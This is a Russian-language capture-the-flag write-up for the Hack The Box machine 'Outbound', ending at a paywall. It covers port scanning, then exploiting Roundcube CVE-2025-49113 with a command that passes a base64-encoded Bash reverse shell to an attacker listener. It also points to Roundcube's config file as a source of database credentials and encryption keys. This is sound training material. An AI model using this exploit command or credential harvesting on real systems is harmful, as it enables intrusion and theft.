Below.Наша цель — получение прав суперпользователя на машине Outbound с учебной площадки Hack The Box. Уровень задания — легкий.
warning
Подключаться к машинам с HTB рекомендуется с применением средств анонимизации и виртуализации. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками.
Разведка
Сканирование портов
Добавляем IP-адрес машины в /:
10.10.11.77 outbound.htb
На этот раз, помимо IP-адреса машины, нам также предоставляют и учетные данные пользователя.
Запускаем сканирование портов.
Справка: сканирование портов
Сканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа.
Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '' ',' | sed s/,$//)nmap -p$ports -A $1Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция -A).
Сканер нашел два открытых порта:
- 22 — служба OpenSSH 9.6p1;
- 80 — веб‑сервер Nginx 1.24.0.
На SSH мы без учетных данных ничего не сделаем, поэтому сразу взглянем, что нам выдаст веб‑сервер. При переходе по адресу в браузере произойдет редирект на домен mail..
Добавим новый поддомен в файл / и обновим страницу. Нас встречает страница авторизации Roundcube.
10.10.11.77 outbound.htb mail.outbound.htb
Точка входа
Авторизуемся с выданными учетными данными и первым делом проверяем версию почтового клиента. Как показывает окно About, на сервере используется Roundcube Webmail 1.6.10.
Первым делом стоит проверить, есть ли для обнаруженной CMS готовые эксплоиты. Для начала можно просто поискать их в Google.
Как видно по первым ссылкам, версия 1.6.10 содержит уязвимость CVE-2025-49113, которая позволяет аутентифицированным пользователям добиться удаленного выполнения кода через десериализацию объектов в PHP, поскольку в program/ нет проверки значения _from из URL.
Воспользуемся этим эксплоитом, но сперва на Reverse Shells Generator сгенерируем реверс‑шелл в формате Bash (Base64).
Затем запускаем листенер pwncat-cs и выполняем эксплоит, которому передаем сгенерированный реверс‑шелл. В результате получаем сессию от имени пользователя службы веб‑сервера www-data.
php ./CVE-2025-49113.php http://mail.outbound.htb/ tyler LhKL1o9Nm3X2 'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC42NC80MzIxIDA+JjE= | base64 -d | bash'
Продвижение
Чтобы изменить контекст работы, нужно поискать учетные данные. Раз на хосте есть почтовый сервер, первым делом попробуем достать логины и пароли пользователей. Есть хороший шанс, что они подойдут и для локальных учетных записей. В случае с Roundcube начни с файла config/: в нем лежат данные для подключения к базе (db_dsnw), а также ключ шифрования паролей пользователей (des_key).
Продолжение доступно только участникам
Вариант 1. Присоединись к сообществу «Xakep.ru», чтобы читать все материалы на сайте
Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее
Вариант 2. Открой один материал
Заинтересовала статья, но нет возможности стать членом клуба «Xakep.ru»? Тогда этот вариант для тебя! Обрати внимание: этот способ подходит только для статей, опубликованных более двух месяцев назад.
Я уже участник «Xakep.ru»
